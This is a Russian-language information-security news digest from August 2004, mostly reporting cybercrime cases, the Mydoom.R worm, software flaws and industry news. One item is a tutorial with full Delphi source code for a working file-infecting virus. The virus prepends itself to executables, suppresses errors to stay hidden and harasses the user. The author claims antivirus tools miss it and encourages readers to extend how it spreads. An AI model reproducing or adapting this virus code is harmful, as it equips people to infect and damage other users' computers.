Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru

Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

17.8.2004 - 21.8.2004

Содержание


Исследования, открытия, лабораторные разработки

Нанотехнология ускорит Интернет в сто раз

17 августа | @Astera

Американская компания Superconnect разработала новый материал, который в будущем поможет ускорить передачу данных в Сети в сто раз. Материал представляет собой особый полимер, склеенный с набором углеродных молекул-бакиболлов. По словам авторов работы, он позволяет управлять потоками света при помощи других потоков. Это — первый шаг на пути создания полностью оптических маршрутизаторов в Сети. Сейчас для управления потоками данных (которые между крупными узлами передаются по оптоволокну), сами пакеты преобразовывают из оптических импульсов в электронные. Чипы определяют направление передачи и переключают канал, после чего поток битов в виде электронов снова переводят в световые импульсы и отправляют к месту назначения. Такие двойные преобразования — одно из узких мест в Сети, снижающих ее общую пропускную способность. Заменив обычные маршрутизаторы, сочетающие оптические и электронные компоненты, на полностью оптические, можно будет повысить скорость передачи данных в Интернете в сто раз.


Проблемные ситуации, информационная преступность, сетевые войны

Шеф американского интернет-агентства отказался признать себя хакером

17 августа | securitylab

Шеф американского рекламного интернет-агентства Snipermail.com Скотт Левин (Scott Levine) на первом заседании суда отказался признать себя виновным в хищении электронных почтовых адресов с сервера компании Acxiom. Обвинительное заключение против Левина включает 144 пункта.

Следующее судебное слушание по делу 45-летнего жителя города Бока Ратон назначено на 27 сентября. До этого момента Левин будет находиться на свободе под залог в 25 тысяч долларов. В случае, если обвиняемый будет точно выполнять все требования суда, деньги будут ему возвращены, отмечает газета Arkansas Democrat.

Сам Левин отказался комментировать ход своего дела. Обвинения в незаконном доступе к защищенной информации и отмывании денег были предъявлены ему 21 июля. По информации обвинения, сотрудники агентства Snipermail.com незаконно использовали информацию Acxiom с апреля 2002 года. Шесть сотрудников, которым не были предъявлены обвинения, согласились сотрудничать с судом во время рассмотрения дела Левина.

Среди сведений, похищенных Левиным, были и номера банковских карт. Однако никаких свидетельств того, что он использовал их для совершения преступлений, нет.

Банковская компьютерная информация становится предметом посягате

17 августа | cyberinfo

Сотрудники Управления Службы безопасности Украины в Днепропетровской области задержали двух злоумышленников, которые имели намерение похитить крупную денежную сумму, совершив ряд незаконных финансовых операций с использованием сети Интернет. При этом мошенники воспользовались конфиденциальной банковской информацией, к которой имел доступ один из них, так был сотрудником финансового учреждения.

По данному факту возбуждено уголовное дело по ч.2 ст.362 Уголовного кодекса Украины (хищение, завладение, вымагательство компьютерной информации либо завладение ею путем мошенничества или злоупотребления служебным положением).

Двое других жителей г.Днепропетровска получили доступ к конфиденциальной компьютерной информации провайдерской компании, прикрываясь которой, анонимно совершали атаки хакеров на один из банков. В результате проведения оперативно-розыскных мер сотрудникам спецслужбы удалось установить злоумышленников.

Деятельность китайской интернет-компании Sohu.com приостановлена на год за рассылку спама

17 августа | Business Online

За рассылку спама приостановлена на год деятельность служб китайской интернет-компании Sohu.com, которая занимается рассылкой видеоизображений по мобильной телефонной связи. Санкции против Sohu.com приняты государственной компанией China Mobile в рамках борьбы с распространением спама по каналам мобильной связи. Sohu.com, в частности, уличена в незаконной рассылке видеорекламы, не востребованной пользователями.


Информационая безопасность бизнеса

От имени «Регтайм» разослали троянца

17 августа | securitylab

Официальный регистратор доменных имен в Рунете, компания «Регтайм», недавно «отличившаяся» рассылкой спама, на днях попала в эпицентр нового скандала. На этот раз от имени компании неизвестными злоумышленниками было разослано письмо, содержащее вирус, сообщает webplanet.ru.

Напомним, что в апреле сего года «Регтайм» стал официальным регистратором доменов в зоне ru. А уже в июле компания сделала несанкционированную рассылку по базе данных whois РосНИИРОС, в результате чего многие владельцы доменных имен получили приглашение воспользоваться услугами регистрации/продления доменов через эту компанию.

Эта выходка до крайности возмутила других регистраторов и, в частности, Ru-Center, который даже собирался исключить «Регтайм» из числа регистраторов. Однако буря миновала — директор Ru-Center Алексей Лесников посчитал, что случай с «Регтаймом» произошел из-за несовершенства стандартного аккредитационного договора, заключаемого с регистраторами, и отправил документ на доработку. Новым проектом договора занимается специальная рабочая группа.

А сегодня, как утверждает пресс-релиз, разосланный «Регтаймом», неизвестные злоумышленники от имени компании разослали по всему Рунету письмо, с вложенным в него вирусом. В письме утверждалось, что компания «Регтайм» более не будет предоставлять возможность работать со своими сервисами через веб-интерфейс. Взамен веба специалистами компании якобы была разработана клиентская программа, которую необходимо установить на компьютере.

Естественно, после запуска вложенного файла на компьютер устанавливалась не клиентская программа, а троянский вирус TrojanDropper.Win32.Microjoin.b.

Генеральный директор ООО «Регтайм», Сергей Шариков, заявил, что «рассылка никак не связана с деятельностью ООО „Регтайм“. Авторы рассылки устанавливаются. Принимаются серьезные меры по предотвращению подобной деятельности».

Спам-фильтр с дефектом

17 августа | osp

Разработчики программы фильтрации спама SpamAssassin признали наличие в своем продукте дефекта, который позволял с помощью специально подготовленного заголовка письма вывести из строя фильтр. Новая версия 2.64 этой свободно распространяемой программы была выпущена специально для исправления этой ошибки. Аналогичная ошибка была найдена и в другом фильтре почты - MAILsweeper от компании Clearswift. Если в сеть, защищенную этим фильтром, переслать специально подготовленный документ в формате PowerPoint, то при его обработке защитная программа полностью оттянет на себя все доступные ресурсы процессора и блокирует работу операционной системы. Впрочем, не на высоте и другой продукт этой компании - MIMEsweeper, который предназначен для контроля за передачей конфиденциальной информации. В результате допущенной ошибки с его помощью удаленный пользователь может просматривать любые файлы на той системе, на которой работает MIMEsweeper. Для обоих своих продуктов Clearswift выпустила соответствующие исправления.


Информационая безопасность общественной коммуникации, личности.

MydoomR начал распространяться по электронной почте

17 августа | Cnews

Специалисты компании Panda Software обнаружили появление новой версии R известного компьютерного червя Mydoom.

MydoomR уже начал широко распространяться по электронной почте. Отправитель червя подделывает адрес. Тема письма — фотографии, в теле письма -‘LOL!;))))’. Вложенный файл носит имя ‘PHOTOS_ARC.EXE’, имеет размер 27 KB и написано в 6 версии Visual C. Компьютер заражается при открытии вложения. MydoomR включает поиск электронных адресов в файлах с определенным расширением и посылает свои копии на все найденные адреса.

Специалисты Panda Software советуют пользователям обновить свое антивирусное программное обеспечение.


Информационные ресурсы

Самый маленький вирус на Delphi

17 августа | cyberinfo

Итак, моя новая статья посвящена вирмэйкерству в особо извращенной форме. Посещая множество форумов и сайтов по сетевой безопасности и программированию, я столкнулся с мнением, что написать компактный и хоть сколько-нибудь опасный вирус на дельфи нельзя…

Что же, я развею этот миф, более того на глазах у изумленной публики создам виря размером 23.40 Кб, который будет полноценно размножаться и мешать работе системы.

Итак, наши инструменты:

  • Борланд Дельфи 7.0 Enterprise Edition
  • UPX PE packer 
  • Прямые руки :)

Для начала определимся, чего мы хотим. А хотим мы создать вирус, для этого надо знать принципы их размножения и поражения жертвы. Вдаваться в терминологию не буду, т.к. за меня это было прекрасно написано в одном из выпусков «Хакер-Спец». Поэтому перейдем к делу. Наша зверушка будет размножаться в пределах одного каталога (кто обладает п.3 из набора инструментов тот доработает этот недочет, нам же нужно сделать тест не расплодив вирь по всему компу) и дописывать себя в начало файла. Сам процесс работы до ужаса банален:

1. Запускаем вирус.
2. Происходит проверка, на запуск тела вируса или зараженной программы.
3. Если запущенно тело вируса, то переходим к заражению.
4. У нас запущена зараженная прога, ура! Распакуем прогу из хвоста файла, задав ей имя от балды и ждем когда юзверь закончит с ней работать. 
5. Пока юзверь работает мешаем ему как можем.
6. Бедный пользователь ПК сдался, ему надоели глюки и он закрыл прогу, затираем созданный файл (тот, который мы распаковали) и продолжаем инфицировать своих соседей по каталогу.
7. Выходим из программы.

Вот собственно и все, что мой вирус может, а теперь реализация. Для начала пишем скелет программы:

program zverofil;
uses sysutils,windows;
const virsize=23040;
var victims:tsearchrec;
f1,f2:file;

begin
end;


Вот с чего мы начинаем, к сожалению мне не удалось выкинуть Sysutils , иначе размер бы ужался до 13Кб.  Процедура заражения выглядит вот так:

procedure infect(victim:string);
var
a:integer;

Buf: array[1..virsize] of byte;
nr,nw:longint;
begin
try
randomize;
assignfile(f1,victim);
a:=random(200);
rename(f1,'bad'+inttostr(a)) ;
filemode :=0;
assignfile(f2,paramstr(0));
reset(f2,1) ;
seek(f2,0);
blockread(f2,buf,virsize);
filemode:=2 ;
closefile(f2);
assignfile(f1,victim);
rewrite(f1,1);
blockwrite(f1,buf,virsize);
assignfile(f2,'bad'+inttostr(a));
reset(f2,1);
seek(f2,0);
repeat
BlockRead(f2, Buf,virsize, NR);
BlockWrite(f1, Buf, NR, NW);
until (NR = 0) or (NW <> NR);
closefile(f1);
closefile(f2);
deletefile(pchar('bad'+inttostr(a)))
except
end;
end;


Exceptы добавлены из соображения секретности, если вирус наткнется на файл, не дающий добро на запись, он тихо и мирно выйдет из процедуры. Иначе пользователя побеспокоит сообщение “File I/O Error” , а нам это ни к чему.

Далее определяем, есть ли у нас «хвост» или запущенная программа – тело вируса в чистом виде:

filemode :=0;
assignfile(f1,paramstr(0));
reset(f1,1);
if filesize(f1)>virsize then go;
closefile(f1);
filemode :=2;


Filemode временно переводит программу в ReadOnly, иначе она не даст нам посчитать размер файла и выдаст ошибку.

Поиск и заражение жертв реализуется так:

if FindFirst('*.exe', Faanyfile, victims) = 0 then
repeat
if not ((victims.Name)=extractfilename(paramstr(0))) then begin
if not ((victims.Name)=extractfilename(extractfilename(paramstr(0)))) then infect(victims.Name);

end;
until FindNext(victims)<>0 ;


Такой странный код из за того, что зараженный файл распадается на «зараженный.ехе» и «незараженный.ехе.ехе» на время запуска, чтобы не попытаться заразить только что запущенную программу, которая к тому же ушла в Read Only и  нужно проводить такую проверку. 

Ну и код выполнения самой зараженной проги будет таким:

procedure go;
label 10;
var
Buf: array[1..virsize] of byte;
rect:trect;
nr,nw:longint;
begin
////
try
filemode :=0;
assignfile(f1,paramstr(0));
reset(f1,1);
filemode :=2;
assignfile(f2,paramstr(0)+'.exe');


rewrite(f2,1);
seek(f1,virsize);
seek(f2,0) ;
repeat
filemode :=0;
BlockRead(f1, Buf,virsize, NR);
filemode :=2;
BlockWrite(f2, Buf, NR, NW);
until (NR = 0) or (NW <> NR) ;
closefile(f1);
closefile(f2);

winexec(pchar(paramstr(0)+ '.exe'), SW_show);
10:

if not deletefile(pchar(paramstr(0)+'.exe')) then begin ;
setcursorpos(random(800),Random(600));
getwindowrect(GetForeGroundWindow,rect);
setwindowpos(GetForeGroundWindow, HWND_TOPMOST,rect.left+1,rect.top+1, rect.left+45,rect.left+45, SWP_NOSENDCHANGING );
setwindowtext(GetForeGroundWindow, 'Antiviruses SUXX! (c)Zerofill');

sleep(400);
goto 10;
end;

except
end;
////
end;


Прошу обратить внимание на последнюю секцию – глумление над пользователем, который работает с зараженной прогой. Мы просто берем и дергаем мышку, а окно самой нужной программы уезжает влево и вниз. Для извращенцев – можете поменять параметр sleep;

Вот собственно и все, надеюсь у вас созрели определенные мысли и идеи по прочтению этой статьи. Напоследок скажу, что этот зверь не виден антивирусами несмотря на то, что я еще в июне отсылал его с исходниками в «Лабараторию Касперского», правда в моем исполнении это был уже почтовый червь (52Кб).

Холдинг ЛАНИТ завершил первый этап проекта по обеспечению информационной безопасности коммуникаций "Ситибанка" с расположенными в Лондоне и Варшаве региональными офисами Citigroup

17 августа | Business Online

Специалисты компании ЛАНИТ и ЗАО КБ "Ситибанк" успешно завершили первый этап совместного проекта по обеспечению комплексной информационной безопасности коммуникаций "Ситибанка" с расположенными в Лондоне и Варшаве региональными офисами Citigroup. На территории Российской Федерации использование импортных криптографических (шифровальных) средств защиты информации ограничено. В связи с тем, что корпоративные стандарты Citigroup предполагают использование зарубежных шифраторов, компании ЛАНИТ требовалось одновременно решить две задачи - не только обеспечить безопасность коммуникаций "Ситибанка" с головными зарубежными офисами, но и получить все необходимые разрешения и лицензии, чтобы реализуемый проект был максимально эффективным и полностью отвечающим требованиям российских законов. Внедренное решение основано на использовании программно-аппаратных канальных шифраторов производства компании SafeNet (США), которая представлена на мировом рынке средствами создания защищенных частных сетей (VPN), формирования архитектуры открытых ключей (PKI), управления цифровыми правами доступа, аутентификации и защиты информации в каналах связи. Поставка импортных шифраторов дочернему банку Citigroup осуществлена компанией ЛАНИТ в полном соответствии с российским законодательством — на основании лицензий Центра ФСБ России по лицензированию, сертификации и защите государственной тайны и Минэкономразвития России, а также - специального разрешения Центра ФСБ. Лицензии Центра ФСБ предоставляют компании ЛАНИТ право осуществлять распространение и техническое обслуживание "шифровальных (криптографических) средств иностранного производства, предназначенных для использования организациями и представительствами иностранных юридических лиц на территории Российской Федерации при информационном обмене с головными офисами этих организаций и юридических лиц, расположенными вне территории Российской Федерации". Лицензия Минэкономразвития и специальное разрешение были выданы на ввоз конкретной партии шифраторов.

Service Pack 2 для ОС Windows XP вызывает системные отказы

17 августа | Business Online

Долгожданное обновление, разработка которого обошлась Microsoft в  1 млрд долл., потрясло ИТ-специалистов. Выяснилось, что после его установки   некоторые программы работать перестают - причем даже продукты самой Microsoft. Уже подготовлен впечатляющий список программ, которые SP2 вывел из строя. В частности, в этом список попали AutoCAD, CuteFTP, eTrust, популярная игра Unreal Tournament, Photoshop Elements, а также большинство файлообменных программ, и, конечно, антивирусы. В скорбном перечне есть и ПО от Microsoft. Изначальные помыслы компании Microsoft были благими: предполагалось, что Service Pack 2 для Windows XP существенно снизит ее уязвимость для вирусов, хакерских атак и компьютерных червей. Вышло все иначе. Новое обновление, улучшив работу самой XP, принялось нещадно "крушить" пользовательские программы. При установке SP2 с проблемами того или иного рода сталкивается каждый третий пользователь, у одного из десяти произошел полный системный отказ. Как сообщает BBC, служба поддержки клиентов Microsoft выработала специальное руководство с советами как следует вести себя в том случае, если пользовательская программа перестала работать после установки SP2. В отношении ряда программ перечень составленных Microsoft рекомендаций включает такие непростые для неискушенного пользователя советы, как поиск и открытие портов, используемых программой, для того чтобы обеспечить необходимый обмен данными через Сеть. П. Рэндл, сотрудник британского офиса Microsoft, главный эксперт по Windows XP, полагает, что большинство проблем связано с относительно старыми программами, которые стремятся получить отныне закрытый доступ к Сети. "Кроме того, это касается и программ, которые пытаются организовать по сети связь клиент-сервер", - сказал он. Однако не все разделяют его сдержанный оптимизм.

Чиновники отрицают, что Linux была разменной картой в игре с Microsoft

17 августа | zdnet.ru

В понедельник официальные представители лондонского пригорода Ньюхэм опровергли подозрения в том, что они симулировали интерес к внедрению Linux, чтобы заставить Microsoft существенно снизить лицензионную плату.

Выступая на презентации партнерства между Ньюхэмом и Microsoft, ответственный за информационные и коммуникационные технологии в Совете Ньюхэма Ричард Стил заявил, что проведенные оценки различных аспектов Windows и ПО open-source были справедливыми и открытыми. «Мы не ведем какую-то игру. Мы очень серьезно изучили Linux», — сказал Стил журналисту ZDNet UK.

Microsoft утверждает, что благодаря этому соглашению, в рамках которого будет внедрено 12 разных продуктов Microsoft (от Office 2003 Professional до SQL Server 2000), Ньюхэм может сэкономить $5,89 млн в течение пяти лет. Отдел социального обеспечения пригорода тестирует также компьютеры Tablet PC.

Теперь софтверный гигант приводит Ньюхэм в доказательство того, что его ПО может обеспечить большие выгоды, чем Linux.

Однако сторонники open-source утверждают, что Microsoft пошла на значительные уступки, чтобы убедить городской совет не сворачивать на путь open-source. Появилось даже особое выражение «doing a Newham», означающее шантаж Microsoft переходом на Linux с целью добиться снижения лицензионной платы.

Выступив на пресс-конференции в понедельник, Стил признал, что конкуренция со стороны Linux помогла договориться с Microsoft на более выгодных условиях. «Было бы странно, если бы этого не произошло», — сказал он.

В прошлом году консалтинговая фирма Capgemini изучила предложенное Microsoft решение и дала заключение, что оно лучше, чем проект open-source, рекомендованный другой консалтинговой фирмой, Netproject. Консультант Capgemini Лесли Берр пояснил на пресс-конференции, что «в программном обеспечении open-source кроется больше проблем безопасности», чем в ПО Microsoft. «Мы приняли во внимание, что Microsoft посвятила много времени и сил безопасности своих систем», — сказал Берр.

Учитывая поток вирусов, червей и троянов, использующих пробелы в защите Windows, странно было услышать, что Microsoft выступает в качестве наиболее безопасной альтернативы. Многие из этих проявлений malware, или злонамеренного ПО, используют дыры в Internet Explorer. Однако Стил не согласен, что он мог бы спать по ночам спокойнее, если бы Совет Ньюхэма предпочел браузер open-source Mozilla. «У меня есть технический персонал, чтобы беспокоиться об этом», — сказал он.

Еще одна спецификация быстродействующих сетей Wi-Fi

17 августа | @Astera

Консорциум сетевых компаний подготовил свои предложения по следующему стандарту беспроводных сетей, так что между конкурирующими группами пролегли четкие линии фронтов. В четверг свои предложения по разработке стандарта Wi-Fi следующего поколения в рабочую группу 802.11n Института инженеров по электротехнике и электронике подала организация, называющая себя WWiSE (World Wide Spectrum Efficiency).

Стандарт 802.11n позволит довести фактическую пропускную способность сетей до 100 Мбит/с. Самый быстрый на сегодняшний день стандарт Wi-Fi 802.11g обеспечивает оптимальное быстродействие 54 Мбит/с, но фактические скорости примерно вдвое ниже. Первый проект спецификации 802.11n планируется выпустить в середине будущего года, а готовый стандарт — в конце 2006 либо в начале 2007. Объявление WWiSE прозвучало за день до назначенного рабочей группой крайнего срока подачи заявок. Совещание по обсуждению поступивших предложений группа IEEE 802.11n планирует провести в середине сентября в Берлине.

Над параллельным проектом работает другая группа компаний, неформально называющая себя TGnSync. В ее состав входят Atheros, Agere, Royal Philips Electronics и Intel. Между двумя группами идет борьба, замешанная на интересах, связанных с правами интеллектуальной собственности. Обе группы обещают выполнять требование справедливых и недискриминационных условий лицензирования (RAND), однако WWiSE утверждает, что если будут приняты ее предложения, члены согласятся и на условия RAND с нулевым роялти (RAND-Z). Компании WWiSE согласились на вариант взаимной индивидуальной лицензии royalty-free, что означает, что они не будут брать с разработчиков деньги за лицензию на 802.11n, что ведет к более низкой себестоимости готовых изделий.

WWiSE предлагает также использовать диапазон радиочастот 20 МГц, чтобы гарантировать всемирное принятие спектра. Это облегчит и ускорит распространение продуктов на базе 802.11n во всем мире. Кроме того, проект предусматривает обратную совместимость с существующими стандартами Wi-Fi. Для достижения высокой скорости передачи данных компании WWiSE будут использовать технологию MIMO-OFDM (multiple input, multiple output-orthogonal frequency division multiplexing). Airgo Networks разработала и выпускает микросхемы на базе технологии MIMO, а недавно компания Belkin объявила о своих планах выпуска, начиная с октября, продуктов с применением этих чипов.

Кроме Airgo, в группу WWiSE входят компании Bermai, Broadcom, Conexant Systems, STMicroelectronics и Texas Instruments.


События, семинары, конференции, даты

Электронный документооборот — осенью

17 августа | pcweek

28 октября в Российской академии государственной службы при Президенте Российской Федерации (Москва, проспект Вернадского, 84) состоится традиционная конференция “Осенний документооборот — 2004”. Она пройдет под эгидой фирмы “Электронные офисные системы” (ЭОС),

Конференция посвящена различным областям работы с документами: электронному и бумажному документообороту, организации корпоративных хранилищ, архивному делопроизводству, кадровым технологиям -- и является особым событием, поскольку в ее рамках будет проводиться официальное празднование десятилетия ЭОС. Здесь же пройдет презентация принципиально нового для компании программного продукта, поставки которого начнутся в ноябре 2004 г.

ЭОС, ее клиенты и партнеры продемонстрируют свои наиболее значимые достижения -- продукты, решения, проекты. Будут показаны различные программные и аппаратные решения, которые ЭОС поставляет совместно со своими партнерами: Microsoft, Oracle, Xerox, "Крипто-Про", ABBYY, ПИРИТ, Hummingbird, "Рускард", "ПроCофт-М" ("Электронный архив"), Documentum, Aladdin и другими компаниями.

К работе в конференции приглашаются руководители и специалисты организаций, использующих продукты ЭОС, представители предприятий, только планирующих внедрить современные системы работы с документами. Рассчитанное на широкий круг участников мероприятие будет разбито на секции с профессиональной ориентацией: в отдельных залах академии будут читаться специализированные доклады для делопроизводителей и ИТ-специалистов.

Для участия в конференции необходимо зарегистрироваться на сайте www.eos.ru или послать заявку по электронной почте: conf@eos.ru.


Дыры и патчи программ и операционных сред

Уязвимость в Explorer "открыла двери" для воров

17 августа | @Astera

Заключается она в том, что Explorer не обновляет содержимое поля "адрес" после определенной последовательности действий со страницей. "Дыра" может быть использована для показа специально подготовленного злоумышленником Web-сайта, во время просмотра которого пользователь увидит в адресной строке адрес сайта, которому он доверяет. Вариантов действия злоумышленников приводится несколько. Во-первых, пользователь может попасть на сайт, похожий на тот, где он обычно совершает покупки, и оставить там номер своей кредитной карты. Во-вторых, сайт, замаскированный под страницу какой-либо организации, может предложить пользователю установить в системе компонент с опасным содержимым. В-третьих, у пользователя могут спросить серийный номер его лицензии ОС.

Подтверждено наличие этой уязвимости в системах с Internet Explorer 6.0, работающих под MS Windows 2000 SP4 / XP SP1. Также уязвимость может присутствовать и в более ранних версиях Explorer.

В качестве решения проблемы предлагается отключить Active Scripting или использовать браузеры других разработчиков. Уровень опасности оценен в 3 балла из 5.




Инструменты управления содержанием Метод.ру
Дата создания документа: 19:22 17.08.04

http://subscribe.ru/
http://subscribe.ru/feedback/
Адрес подписки
Отписаться

В избранное